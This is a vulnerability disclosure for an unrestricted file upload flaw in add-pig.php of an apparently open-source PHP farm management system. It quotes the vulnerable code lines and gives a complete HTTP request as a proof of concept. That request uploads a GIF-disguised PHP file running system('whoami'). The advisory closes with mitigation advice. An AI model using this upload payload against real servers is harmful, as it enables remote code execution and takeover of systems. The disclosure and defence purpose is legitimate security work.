Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload
NAME OF AFFECTED PRODUCT(S)
- Farm Management System In PHP
AFFECTED AND/OR FIXED VERSION(S)
submitter
- zzz,xiongbaojiang
Vulnerable File
- add-pig.php
VERSION(S)
- V1.0
PROBLEM TYPE
Vulnerability Type
- Unrestricted Upload
Root Cause
In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
Vulnerability Path
In the add-pig.php file of the “Farm Management System In PHP” project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.
Key Parameter:
Parameter:
$res1_nameFile Name:
farm management system/add-pig.phpLine Number: 37
$res1_name = basename($_FILES['pigphoto']['name']);
File Upload:
Trigger Path: Arbitrary File Upload/Write
File Name:
farm management system/add-pig.phpLine Number: 45
$move = move_uploaded_file($tmp_name, $location.$res1_name);
Vulnerability POC
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"
pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"
2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"
male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"
active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"
23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"
1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"
-----------------------------85676068117477891701865867569--
Payload:
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream
GIF89a;
<?php
system('whoami');
?>
The following are screenshots of some specific information obtained from testing and running with the yakit tool:
/uploadfolder/test.php
Recommendations for Vulnerability Mitigation
- File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
- File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
- Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
- Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
- Input Validation: Rigorously validate all user inputs to ensure security.